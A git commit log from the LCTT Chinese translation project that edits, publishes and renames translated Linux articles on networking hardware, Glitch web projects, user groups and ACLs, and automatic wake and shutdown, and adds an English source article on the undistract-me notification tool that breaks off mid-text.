把局域网分成可管理的不同网段将有助于管理更大的网络。 - 图2展示了一个分成两个子网的局域网络:内部的有线和无线主机,和非军事区域(从来不知道所所有的工作上的男性术语都是在计算机上键入的?)因为他被阻挡了所有的内部网络的访问。 - - -### [fig-2.png][5] - -![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") - -图2:一个分成两个子网的简单局域网。 -即使像图2那样的小型网络也可以有不同的配置方法。你可以将防火墙和路由器放置在一台单独的设备上。 -你可以为你的非军事区域设置一个专用的网络连接,把它完全从你的内部网络隔离,这将引导我们进入下一个主题:一切基于软件。 - - -### Think Software软件思维 - - -你可能已经注意到在这个简短的系列中我们所讨论的硬件,只有网络接口,交换机,和线缆是特殊用途的硬件。 -其它的都是通用的商用硬件,而且都是软件来定义它的用途。 -网关,虚拟专用网关,以太网桥,网页,邮箱以及文件等等。 -服务器,负载均衡,代理,大量的服务,各种各样的认证,中继,故障转移...你可以在运行着Linux系统的标准硬件上运行你的整个网络。 -你甚至可以使用Linux交换应用和VDE2协议来模拟以太网交换机,像DD-WRT,openWRT 和Rashpberry Pi distros,这些小型的硬件都是有专业的分类的,要记住BSDS和它们的特殊衍生用途如防火墙,路由器,和网络附件存储。 -你知道有些人坚持认为硬件防火墙和软件防火墙有区别?其实是没有区别的,就像说有一台硬件计算机和一台软件计算机。 -### Port Trunking and Ethernet Bonding -端口聚合和以太网绑定 -聚合和绑定,也称链路聚合,是把两条以太网通道绑定在一起成为一条通道。一些交换机支持端口聚合,就是把两个交换机端口绑定在一起成为一个是他们原来带宽之和的一条新的连接。对于一台承载很多业务的服务器来说这是一个增加通道带宽的有效的方式。 -你也可以在以太网口进行同样的配置,而且绑定汇聚的驱动是内置在Linux内核中的,所以不需要任何其他的专门的硬件。 - - -### Bending Mobile Broadband to your Will随心所欲选择你的移动带宽 - -我期望移动带宽能够迅速增长来替代DSL和有线网络。我居住在一个有250,000人口的靠近一个城市的地方,但是在城市以外,要想接入互联网就要靠运气了,即使那里有很大的用户上网需求。我居住的小角落离城镇有20分钟的距离,但对于网络服务供应商来说他们几乎不会考虑到为这个地方提供网络。 我唯一的选择就是移动带宽; 这里没有拨号网络,卫星网络(即使它很糟糕)或者是DSL,电缆,光纤,但却没有阻止网络供应商把那些在我这个区域从没看到过的无限制通信个其他高速网络服务的传单塞进我的邮箱。 -我试用了AT&T,Version,和T-Mobile。Version的信号覆盖范围最广,但是Version和AT&T是最昂贵的。 -我居住的地方在T-Mobile信号覆盖的边缘,但迄今为止他们给了最大的优惠,为了能够能够有效的使用,我必须购买一个WeBoostDe信号放大器和 -一台中兴的移动热点设备。当然你也可以使用一部手机作为热点,但是专用的热点设备有着最强的信号。如果你正在考虑购买一台信号放大器,最好的选择就是WeBoost因为他们的服务支持最棒,而且他们会尽最大努力去帮助你。在一个小小的APP的协助下去设置将会精准的增强 你的网络信号,他们有一个功能较少的免费的版本,但你将一点都不会后悔去花两美元使用专业版。 -那个小巧的中兴热点设备能够支持15台主机而且还有拥有基本的防火墙功能。 但你如果你使用像 Linksys WRT54GL这样的设备,使用Tomato,openWRT,或者DD-WRT来替代普通的固件,这样你就能完全控制你的防护墙规则,路由配置,以及任何其他你想要设置的服务。 - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-think-software - -作者:[CARLA SCHRODER][a] -译者:[FelixYFZ](https://github.com/FelixYFZ) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/creative-commons-zero -[4]:https://www.linux.com/files/images/fig-1png-7 -[5]:https://www.linux.com/files/images/fig-2png-4 -[6]:https://www.linux.com/files/images/soderskar-islandjpg -[7]:https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-lan-hardware -[8]:http://www.bluelinepc.com/signalcheck/ diff --git a/translated/tech/20171113 Glitch write fun small web projects instantly.md b/translated/tech/20171113 Glitch write fun small web projects instantly.md deleted file mode 100644 index fde7d7f880..0000000000 --- a/translated/tech/20171113 Glitch write fun small web projects instantly.md +++ /dev/null @@ -1,73 +0,0 @@ -Glitch:立即写出有趣的小型网站项目 -============================================================ - -我刚写了一篇关于 Jupyter Notebooks 是一个有趣的交互式写 Python 代码的方式。这让我想起我最近学习了 Glitch,这个我同样喜爱!我构建了一个小的程序来用于[关闭转发 twitter][2]。因此有了这篇文章! - -[Glitch][3] 是一个简单的构建 Javascript web 程序的方式(javascript 后端、javascript 前端) - -关于 glitch 有趣的事有: - -1. 你在他们的网站输入 Javascript 代码 - -2. 只要输入了任何代码,它会自动用你的新代码重载你的网站。你甚至不必保存!它会自动保存。 - -所以这就像 Heroku,但更神奇!像这样的编码(你输入代码,代码立即在公共网络上运行)对我而言感觉很**有趣**。 - -这有点像 ssh 登录服务器,编辑服务器上的 PHP/HTML 代码,并让它立即可用,这也是我所喜爱的。现在我们有了“更好的部署实践”,而不是“编辑代码,它立即出现在互联网上”,但我们并不是在谈论严肃的开发实践,而是在讨论编写微型程序的乐趣。 - -### Glitch 有很棒的示例应用程序 - -Glitch 似乎是学习编程的好方式! - -比如,这有一个太空侵略者游戏(由 [Mary Rose Cook][4] 编写):[https://space-invaders.glitch.me/][5]。我喜欢的是我只需要点击几下。 - -1. 点击 “remix this” - -2. 开始编辑代码使箱子变成橘色而不是黑色 - -3. 制作我自己太空侵略者游戏!我的在这:[http://julias-space-invaders.glitch.me/][1]。(我只做了很小的更改使其变成橘色,没什么神奇的) - -他们有大量的示例程序,你可以从中启动 - 例如[机器人][6]、[游戏][7]等等。 - -### 实际有用的非常好的程序:tweetstorms - -我学习 Glitch 的方式是从这个程序:[https://tweetstorms.glitch.me/][8],它会向你展示给定用户的 tweetstorm。 - -比如,你可以在 [https://tweetstorms.glitch.me/sarahmei][10] 看到 [@sarahmei][9] 的 tweetstorm(她发布了很多好的 tweetstorm!)。 - -### 我的 Glitch 程序: 关闭转推 - -当我了解到 Glitch 的时候,我想关闭在 Twitter 上关注的所有人的转推(我知道可以在 Tweetdeck 中做这件事),而且手动做这件事是一件很痛苦的事 - 我一次只能设置一个人。所以我写了一个 Glitch 程序来为我做! - -我喜欢我不必设置一个本地开发环境,我可以直接开始输入然后开始! - -Glitch 只支持 Javascript,我不非常了解 Javascript(我之前从没写过一个 Node 程序),所以代码不是很好。但是编写它很愉快 - 能够输入并立即看到我的代码运行是令人愉快的。这是我的项目:[https://turn-off-retweets.glitch.me/][11]。 - -### 就是这些! - -使用 Glitch 感觉真的很有趣和民主。通常情况下,如果我想 fork 某人的 Web 项目,并做出更改,我不会这样做 - 我必须 fork,找一个托管,设置本地开发环境或者 Heroku 或其他,安装依赖项等。我认为像安装 node.js 依赖关系这样的任务过去很有趣,就像“我正在学习新东西很酷”,现在我觉得它们很乏味。 - -所以我喜欢只需点击 “remix this!” 并立即在互联网上能有我的版本。 - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ - -作者:[Julia Evans ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/ -[1]:http://julias-space-invaders.glitch.me/ -[2]:https://turn-off-retweets.glitch.me/ -[3]:https://glitch.com/ -[4]:https://maryrosecook.com/ -[5]:https://space-invaders.glitch.me/ -[6]:https://glitch.com/handy-bots -[7]:https://glitch.com/games -[8]:https://tweetstorms.glitch.me/ -[9]:https://twitter.com/sarahmei -[10]:https://tweetstorms.glitch.me/sarahmei -[11]:https://turn-off-retweets.glitch.me/ diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/translated/tech/20171201 How to Manage Users with Groups in Linux.md deleted file mode 100644 index 1927de6817..0000000000 --- a/translated/tech/20171201 How to Manage Users with Groups in Linux.md +++ /dev/null @@ -1,183 +0,0 @@ -如何在 Linux 系统中用用户组来管理用户 -============================================================ - -### [group-of-people-1645356_1920.jpg][1] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) - -本教程可以了解如何通过用户组和访问控制表(ACL)来管理用户。 - -[创意共享协议][4] - -当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,某个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。在 Linux 中,这是完全可以实现的。但前提是你必须先了解如何通过用户组和访问控制表(ACL)来管理用户。 - -我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你可以在你所选择的 Linux 发行版完成你所需要做的一切。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 - -为了达到演示的目的,我将假设: - -你需要用下面两个用户名新建两个用户: - -* olivia - -* nathan - -你需要新建以下两个用户组: - -* readers - -* editors - -olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的信息·。你可以扩展这个任务以适应你其他更大的需求。 - -我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 sudo 命令,你必须切换到 root 用户来执行这些命令。 - -### 创建用户 - -我们需要做的第一件事是为我们的实验创建两个用户。可以用 ``useradd`` 命令来创建用户,我们不只是简单地创建一个用户,而需要同时创建用户和属于他们的家目录,然后给他们设置密码。 - -``` -sudo useradd -m olivia - -sudo useradd -m nathan -``` - -我们现在创建了两个用户,如果你看看 ``/home`` 目录,你可以发现他们的家目录(因为我们用了 -m 选项,可以帮在创建用户的同时创建他们的家目录。 - -之后,我们可以用以下命令给他们设置密码: - -``` -sudo passwd olivia - -sudo passwd nathan -``` - -就这样,我们创建了两个用户。 - -### 创建用户组并添加用户 - -现在我们将创建 readers 和 editors 用户组,然后给它们添加用户。创建用户组的命令是: - -``` -addgroup readers - -addgroup editors -``` - -(译者注:当你使用 CentOS 等一些 Linux 发行版时,可能系统没有 addgroup 这个命令,推荐使用 groupadd 命令来替换 addgroup 命令以达到同样的效果) - - -### [groups_1.jpg][2] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) - -图一:我们可以使用刚创建的新用户组了。 - -[Used with permission][5] - -创建用户组后,我们需要添加我们的用户到这两个用户组。我们用以下命令来将 nathan 用户添加到 readers 用户组: - -``` -sudo usermod -a -G readers nathan -``` -用以下命令将 olivia 添加到 editors 用户组: - -``` -sudo usermod -a -G editors olivia -``` - -现在我们可以通过用户组来管理用户了。 - -### 给用户组授予目录的权限 - -假设你有个目录 ``/READERS`` 且允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: - -``` -sudo chown -R :readers /READERS -``` - -接下来,执行以下命令收回目录所属用户组的写入权限: - -``` -sudo chmod -R g-w /READERS -``` - -然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在 readers 组中的用户访问这个目录里的文件): - -``` -sudo chmod -R o-x /READERS -``` - -这时候,只有目录的所有者(root)和用户组 reader 中的用户可以访问 ``/READES`` 中的文件。 - -假设你有个目录 ``/EDITORS`` ,你需要给用户组 editors 里的成员这个目录的读和写的权限。为了达到这个目的,执行下面的这些命令是必要的: - -``` -sudo chown -R :editors /EDITORS - -sudo chmod -R g+w /EDITORS - -sudo chmod -R o-x /EDITORS -``` - -此时 editors 用户组的所有成员都可以访问和修改其中的文件。除此之外其他用户(除了 root 之外)无法访问 ``/EDITORS`` 中的任何文件。 - -使用这个方法的问题在于,你一次只能操作一个组和一个目录而已。这时候访问控制表(ACL)就可以派得上用场了。 - - -### 使用访问控制表(ACL) - -现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限并同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 - -这个命令的结构如下: - -``` -setfacl OPTION X:NAME:Y /DIRECTORY -``` - -其中 OPTION 是可选选项,X 可以是 u(用户)或者是 g (用户组),NAME 是用户或者用户组的名字,/DIRECTORY 是要用到的目录。我们将使用 -m 选项进行修改(modify)。因此,我们给 readers 用户组添加读取权限的命令是: - -``` -sudo setfacl -m g:readers:rx -R /DATA -``` - -现在 readers 用户组里面的每一个用户都可以读取 /DATA 目录里的文件了,但是他们不能修改里面的内容。 - -为了给 editors 用户组里面的用户读写权限,我们执行了以下命令: - -``` -sudo setfacl -m g:editors:rwx -R /DATA -``` -上述命令将赋予 editors 用户组中的任何成员读取权限,同时保留 readers 用户组的只读权限。 - -### 更多的权限控制 - -使用访问控制表(ACL),你可以实现你所需的权限控制。你可以添加用户到用户组,并且灵活地控制这些用户组对每个目录的权限以达到你的需求。如果想了解上述工具的更多信息,可以执行下列的命令: - -* man usradd - -* man addgroup - -* man usermod - -* man sefacl - -* man chown - -* man chmod - - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux - -作者:[Jack Wallen ] -译者:[imquanquan](https://github.com/imquanquan) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.linux.com/files/images/group-people-16453561920jpg -[2]:https://www.linux.com/files/images/groups1jpg -[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[4]:https://www.linux.com/licenses/category/creative-commons-zero -[5]:https://www.linux.com/licenses/category/used-permission From 0783a0be6e2a322d3455eda0ee19001fa02240be Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 10:03:52 +0800 Subject: [PATCH 0332/1627] PRF:20171130 Wake up and Shut Down Linux Automatically.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @HardworkFish 恭喜你,完成了第一篇翻译! --- ...ke up and Shut Down Linux Automatically.md | 86 ++++++++----------- 1 file changed, 38 insertions(+), 48 deletions(-) diff --git a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md index a4b829620f..d1c2167a35 100644 --- a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -1,37 +1,36 @@ - -自动唤醒和关闭 Linux +如何自动唤醒和关闭 Linux ===================== -### [banner.jpg][1] - ![timekeeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) -了解如何通过配置 Linux 计算机来查看时间,并实现自动唤醒和关闭 Linux +> 了解如何通过配置 Linux 计算机来根据时间自动唤醒和关闭。 -[Creative Commons Attribution][6][The Observatory at Delhi][7] -不要成为一个电能浪费者。如果你的电脑不需要开机就请把它们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭 Linux 。 +不要成为一个电能浪费者。如果你的电脑不需要开机就请把它们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭。 -### 系统运行时间 +### 宝贵的系统运行时间 -有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才允许机器关机。我认为比较实际可行的是能够在机器需要节省电能以及在移动硬件发生磨损的情况下,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到它要进行下一次备份。或者,你可以设置你的 Internet 网关只在特定的时间运行。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 +有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才需要机器关机。我认为比较实际可行的是,像减少移动部件磨损一样节省电能,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到它要进行下一次备份。或者,你可以设置你的互联网网关只在特定的时间运行。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 ### 系统休眠 -对于不需要一直运行的电脑,使用 root 的 cron 定时任务或者 `/etc/crontab` 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 +对于不需要一直运行的电脑,使用 root 的 cron 定时任务(即 `/etc/crontab`)可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天晚上 11 点 15 分定时关机。 ``` # crontab -e -u root # m h dom mon dow command 15 23 * * * /sbin/shutdown -h now ``` + 以下示例仅在周一至周五运行: + ``` 15 23 * * 1-5 /sbin/shutdown -h now ``` -您可以为不同的日期和时间创建多个cron作业。 通过命令 ``man 5 crontab`` 可以了解所有时间和日期的字段。 -一个快速、容易的方式是,使用 `/etc/crontab ` 文件。但这样你必须指定用户: +您可以为不同的日期和时间创建多个 cron 作业。 通过命令 `man 5 crontab` 可以了解所有时间和日期的字段。 + +一个快速、容易的方式是,使用 `/etc/crontab` 文件。但这样你必须指定用户: ``` 15 23 * * 1-5 root shutdown -h now @@ -39,26 +38,21 @@ ### 自动唤醒 -实现自动唤醒是一件很酷的事情; 我大多数使用 SUSE (SUSE Linux)的同事都在纽伦堡,因此,因此为了跟同事能有几小时一起工作的时间,我不得不需要在凌晨五点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 +实现自动唤醒是一件很酷的事情;我大多数 SUSE (SUSE Linux)的同事都在纽伦堡,因此,因此为了跟同事能有几小时一起工作的时间,我不得不需要在凌晨五点起床。我的计算机早上 5 点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 -唤醒 Linux 计算机可能不比关闭它稳当,因此你可能需要尝试不同的办法。你可以使用远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒这些方式。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要拔掉电源开关将其彻底关闭。 +唤醒 Linux 计算机可能不如关闭它可靠,因此你可能需要尝试不同的办法。你可以使用远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒这些方式。这些方式可行的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。只有在你拔掉电源开关时其才彻底关闭。 ### BIOS 唤醒 -BIOS 唤醒是最可靠的。我的系统主板 BIOS 有一个易于使用的唤醒调度程序。(Figure 1). Chances are yours does, too. Easy peasy. - -### [fig-1.png][2] +BIOS 唤醒是最可靠的。我的系统主板 BIOS 有一个易于使用的唤醒调度程序 (图 1)。对你来说也是一样的容易。 ![wakeup](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) -Figure 1: My system BIOS has an easy-to-use wakeup scheduler. - -[Used with permission][8] - +*图 1:我的系统 BIOS 有个易用的唤醒定时器。* ### 主机远程唤醒(Wake-On-LAN) -远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何 Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN ,要是支持的话,必须先启动它,因为它被默认为禁用。 +远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或树莓派Raspberry Pi发送给基于 Linux 的路由器或者任何 Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN ,要是支持的话,必须先启动它,因为它被默认为禁用。 然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 `ethtool` 命令查看网卡是否支持 Wake-On-LAN : @@ -67,69 +61,65 @@ Figure 1: My system BIOS has an easy-to-use wakeup scheduler. Supports Wake-on: pumbg Wake-on: g ``` -这条命令输出的 Supports Wake-on 字段会告诉你你的网卡现在开启了哪些功能: + +这条命令输出的 “Supports Wake-on” 字段会告诉你你的网卡现在开启了哪些功能:     * d -- 禁用 - * p -- 物理活动唤醒 - * u -- 单播消息唤醒 - * m -- 多播(组播)消息唤醒 - * b -- 广播消息唤醒 +* a -- ARP 唤醒 +* g -- 特定数据包magic packet唤醒 +* s -- 设有密码的特定数据包magic packet唤醒 -* a -- ARP(Address Resolution Protocol) 唤醒 - -* g -- magic packet 唤醒 - -* s -- 设有密码的 magic packet 唤醒 - -man ethtool 命令并没说清楚 p 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是 `g -- magic packet` 唤醒,而且显示这个功能已经在启用了。如果它没有被启用,你可以通过 `ethtool` 命令来启用它。 +`ethtool` 命令的 man 手册并没说清楚 `p` 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是 `g` —— 特定数据包magic packet唤醒,而且下面的“Wake-on” 行显示这个功能已经在启用了。如果它没有被启用,你可以通过 `ethtool` 命令来启用它。 ``` # ethtool -s eth0 wol g ``` + 这条命令可能会在重启后失效,所以为了确保万无一失,你可以创建个 root 用户的定时任务(cron)在每次重启的时候来执行这条命令。 + ``` @reboot /usr/bin/ethtool -s eth0 wol g ``` -### [fig-2.png][3] +另一个选择是最近的网络管理器Network Manager版本有一个很好的小复选框来启用 Wake-On-LAN(图 2)。 ![wakeonlan](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_7.png?itok=XQAwmHoQ) -Figure 2: Enable Wake on LAN. +*图 2:启用 Wake on LAN* -[Used with permission][9] +这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持安全开机Secure On密码,它就不起作用。 -另一个选择是最近的网络管理器版本有一个很好的小复选框来启用 Wake-On-LAN(图2)。 - -这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持安全密码,它就不起作用。 - -现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要用到的是想要唤醒的机器的网络接口和MAC地址信息。 +现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的普通用户创建 cron 任务。你需要用到的是想要唤醒的机器的网络接口和MAC地址信息。 ``` 30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B ``` -### RTC 唤醒(RTC Alarm Clock) + +### RTC 唤醒 通过使用实时闹钟来唤醒计算机是最不可靠的方法。对于这个方法,可以参看 [Wake Up Linux With an RTC Alarm Clock][4] ;对于现在的大多数发行版来说这种方法已经有点过时了。 -下周继续了解更多关于使用RTC唤醒的方法。 +下周继续了解更多关于使用 RTC 唤醒的方法。 -通过 Linux 基金会和 edX 可以学习更多关于 Linux 的免费 [ Linux 入门][5]教程。 +通过 Linux 基金会和 edX 可以学习更多关于 Linux 的免费 [Linux 入门][5]教程。 + +(题图:[The Observatory at Delhi][7]) -------------------------------------------------------------------------------- via:https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically -作者:[Carla Schroder] -译者:[译者ID](https://github.com/HardworkFish) -校对:[校对者ID](https://github.com/校对者ID) +作者:[Carla Schroder][a] +译者:[HardworkFish](https://github.com/HardworkFish) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 +[a]:https://www.linux.com/users/cschroder [1]:https://www.linux.com/files/images/bannerjpg [2]:https://www.linux.com/files/images/fig-1png-11 [3]:https://www.linux.com/files/images/fig-2png-7 From cc4ba2f3b8da76146ec6d33db86935a887ed69e8 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 10:04:35 +0800 Subject: [PATCH 0333/1627] PUB:20171130 Wake up and Shut Down Linux Automatically.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @HardworkFish 文章发布地址:https://linux.cn/article-9115-1.html LCTT 专页地址:https://linux.cn/lctt/HardworkFish --- .../20171130 Wake up and Shut Down Linux Automatically.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171130 Wake up and Shut Down Linux Automatically.md (100%) diff --git a/translated/tech/20171130 Wake up and Shut Down Linux Automatically.md b/published/20171130 Wake up and Shut Down Linux Automatically.md similarity index 100% rename from translated/tech/20171130 Wake up and Shut Down Linux Automatically.md rename to published/20171130 Wake up and Shut Down Linux Automatically.md From ccbb494a35afac3934b0b673580b8ebdebcc3a8c Mon Sep 17 00:00:00 2001 From: root Date: Wed, 6 Dec 2017 10:15:56 +0800 Subject: [PATCH 0334/1627] rename --- ...Long Running Terminal Commands Complete.md | 156 ++++++++++++++++++ ...1 Fedora Classroom Session_Ansible 101.md} | 0 2 files changed, 156 insertions(+) create mode 100644 sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md rename sources/tech/{20171201 Fedora Classroom Session: Ansible 101.md => 20171201 Fedora Classroom Session_Ansible 101.md} (100%) diff --git a/sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md new file mode 100644 index 0000000000..46afe9b893 --- /dev/null +++ b/sources/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md @@ -0,0 +1,156 @@ +translating---geekpi + +Undistract-me : Get Notification When Long Running Terminal Commands Complete +============================================================ + +by [sk][2] · November 30, 2017 + +![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) + +A while ago, we published how to [get notification when a Terminal activity is done][3]. Today, I found out a similar utility called “undistract-me” that notifies you when long running terminal commands complete. Picture this scenario. You run a command that takes a while to finish. In the mean time, you check your facebook and get so involved in it. After a while, you remembered that you ran a command few minutes ago. You go back to the Terminal and notice that the command has already finished. But you have no idea when the command is completed. Have you ever been in this situation? I bet most of you were in this situation many times. This is where “undistract-me” comes in help. You don’t need to constantly check the terminal to see if a command is completed or not. Undistract-me utility will notify you when a long running command is completed. It will work on Arch Linux, Debian, Ubuntu and other Ubuntu-derivatives. + +#### Installing Undistract-me + +Undistract-me is available in the default repositories of Debian and its variants such as Ubuntu. All you have to do is to run the following command to install it. + +``` +sudo apt-get install undistract-me +``` + +The Arch Linux users can install it from AUR using any helper programs. + +Using [Pacaur][4]: + +``` +pacaur -S undistract-me-git +``` + +Using [Packer][5]: + +``` +packer -S undistract-me-git +``` + +Using [Yaourt][6]: + +``` +yaourt -S undistract-me-git +``` + +Then, run the following command to add “undistract-me” to your Bash. + +``` +echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc +``` + +Alternatively you can run this command to add it to your Bash: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc +``` + +If you are in Zsh shell, run this command: + +``` +echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc +``` + +Finally update the changes: + +For Bash: + +``` +source ~/.bashrc +``` + +For Zsh: + +``` +source ~/.zshrc +``` + +#### Configure Undistract-me + +By default, Undistract-me will consider any command that takes more than 10 seconds to complete as a long-running command. You can change this time interval by editing /usr/share/undistract-me/long-running.bash file. + +``` +sudo nano /usr/share/undistract-me/long-running.bash +``` + +Find “LONG_RUNNING_COMMAND_TIMEOUT” variable and change the default value (10 seconds) to something else of your choice. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] + +Save and close the file. Do not forget to update the changes: + +``` +source ~/.bashrc +``` + +Also, you can disable notifications for particular commands. To do so, find the “LONG_RUNNING_IGNORE_LIST” variable and add the commands space-separated like below. + +By default, the notification will only show if the active window is not the window the command is running in. That means, it will notify you only if the command is running in the background Terminal window. If the command is running in active window Terminal, you will not be notified. If you want undistract-me to send notifications either the Terminal window is visible or in the background, you can set IGNORE_WINDOW_CHECK to 1 to skip the window check. + +The other cool feature of Undistract-me is you can set audio notification along with visual notification when a command is done. By default, it will only send a visual notification. You can change this behavior by setting the variable UDM_PLAY_SOUND to a non-zero integer on the command line. However, your Ubuntu system should have pulseaudio-utils and sound-theme-freedesktop utilities installed to enable this functionality. + +Please remember that you need to run the following command to update the changes made. + +For Bash: + +``` +source ~/.bashrc +``` + +For Zsh: + +``` +source ~/.zshrc +``` + +It is time to verify if this really works. + +#### Get Notification When Long Running Terminal Commands Complete + +Now, run any command that takes longer than 10 seconds or the time duration you defined in Undistract-me script. + +I ran the following command on my Arch Linux desktop. + +``` +sudo pacman -Sy +``` + +This command took 32 seconds to complete. After the completion of the above command, I got the following notification. + + 